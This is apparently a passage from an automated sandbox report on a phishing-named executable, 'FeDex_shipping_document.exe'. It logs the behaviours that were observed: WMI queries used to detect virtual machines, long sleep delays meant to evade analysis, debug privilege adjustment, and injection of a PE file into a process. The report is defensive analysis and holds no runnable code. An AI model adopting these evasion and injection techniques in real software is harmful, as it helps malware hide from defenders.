        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOX

        Malware Analysis System Evasion

        barindex
        Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
        Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 5296Thread sleep time: -40023s >= -30000s
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 5588Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 5852Thread sleep count: 9470 > 30
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 6104Thread sleep time: -13835058055282155s >= -30000s
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 6104Thread sleep time: -1200000s >= -30000s
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 6104Thread sleep time: -1199750s >= -30000s
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 6104Thread sleep time: -1199609s >= -30000s
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 6104Thread sleep time: -1199484s >= -30000s
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 6104Thread sleep time: -1199356s >= -30000s
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 6104Thread sleep time: -1199203s >= -30000s
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 6104Thread sleep time: -1199062s >= -30000s
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 6104Thread sleep time: -1198943s >= -30000s
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 6104Thread sleep time: -1198797s >= -30000s
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 6104Thread sleep time: -1198641s >= -30000s
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 6104Thread sleep time: -1198495s >= -30000s
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 6104Thread sleep time: -1198340s >= -30000s
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 6104Thread sleep time: -1198199s >= -30000s
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 6104Thread sleep time: -1197797s >= -30000s
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 6104Thread sleep time: -1197594s >= -30000s
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 6104Thread sleep time: -1197453s >= -30000s
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 6104Thread sleep time: -1197296s >= -30000s
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 6104Thread sleep time: -1197146s >= -30000s
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 6104Thread sleep time: -1197017s >= -30000s
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 6104Thread sleep time: -1196889s >= -30000s
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 6104Thread sleep time: -1196770s >= -30000s
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 6104Thread sleep time: -1196650s >= -30000s
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 6104Thread sleep time: -1196530s >= -30000s
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 6104Thread sleep time: -1196426s >= -30000s
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 6104Thread sleep time: -1196299s >= -30000s
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 6104Thread sleep time: -1196145s >= -30000s
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 6104Thread sleep time: -1196018s >= -30000s
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 6104Thread sleep time: -1195896s >= -30000s
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 6104Thread sleep time: -1195760s >= -30000s
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 6104Thread sleep time: -1195640s >= -30000s
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 6104Thread sleep time: -1195535s >= -30000s
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 6104Thread sleep time: -1195348s >= -30000s
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 6104Thread sleep time: -1195192s >= -30000s
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 6104Thread sleep time: -1195005s >= -30000s
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 6104Thread sleep time: -1194848s >= -30000s
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 6104Thread sleep time: -1194692s >= -30000s
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 6104Thread sleep time: -1194557s >= -30000s
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 6104Thread sleep time: -1194442s >= -30000s
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 6104Thread sleep time: -1194302s >= -30000s
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 6104Thread sleep time: -1194182s >= -30000s
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 6104Thread sleep time: -1194066s >= -30000s
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 6104Thread sleep time: -1193928s >= -30000s
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 6104Thread sleep time: -1193798s >= -30000s
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 6104Thread sleep time: -1193634s >= -30000s
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 6104Thread sleep time: -1193517s >= -30000s
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 6104Thread sleep time: -1193401s >= -30000s
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 6104Thread sleep time: -1193286s >= -30000s
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 6104Thread sleep time: -1193145s >= -30000s
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 6104Thread sleep time: -1193005s >= -30000s
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 922337203685477
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 922337203685477
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1200000
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1199750
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1199609
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1199484
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1199356
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1199203
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1199062
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1198943
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1198797
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1198641
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1198495
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1198340
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1198199
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1197797
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1197594
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1197453
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1197296
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1197146
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1197017
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1196889
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1196770
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1196650
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1196530
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1196426
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1196299
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1196145
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1196018
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1195896
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1195760
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1195640
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1195535
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1195348
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1195192
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1195005
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1194848
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1194692
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1194557
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1194442
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1194302
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1194182
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1194066
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1193928
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1193798
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1193634
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1193517
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1193401
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1193286
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1193145
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1193005
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeWindow / User API: threadDelayed 9470
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 40023
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 922337203685477
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 922337203685477
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1200000
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1199750
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1199609
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1199484
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1199356
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1199203
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1199062
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1198943
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1198797
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1198641
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1198495
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1198340
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1198199
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1197797
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1197594
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1197453
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1197296
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1197146
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1197017
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1196889
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1196770
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1196650
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1196530
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1196426
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1196299
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1196145
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1196018
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1195896
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1195760
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1195640
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1195535
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1195348
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1195192
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1195005
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1194848
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1194692
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1194557
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1194442
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1194302
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1194182
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1194066
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1193928
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1193798
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1193634
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1193517
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1193401
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1193286
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1193145
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 1193005
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess token adjusted: Debug
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeMemory allocated: page read and write | page guard

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Injects a PE file into a foreign processes
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeMemory written: C:\Users\user\Desktop\FeDex_shipping_document.exe base: 400000 value starts with: 4D5A
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess created: C:\Users\user\Desktop\FeDex_shipping_document.exe C:\Users\user\Desktop\FeDex_shipping_document.exe
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Users\user\Desktop\FeDex_shipping_document.exe VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
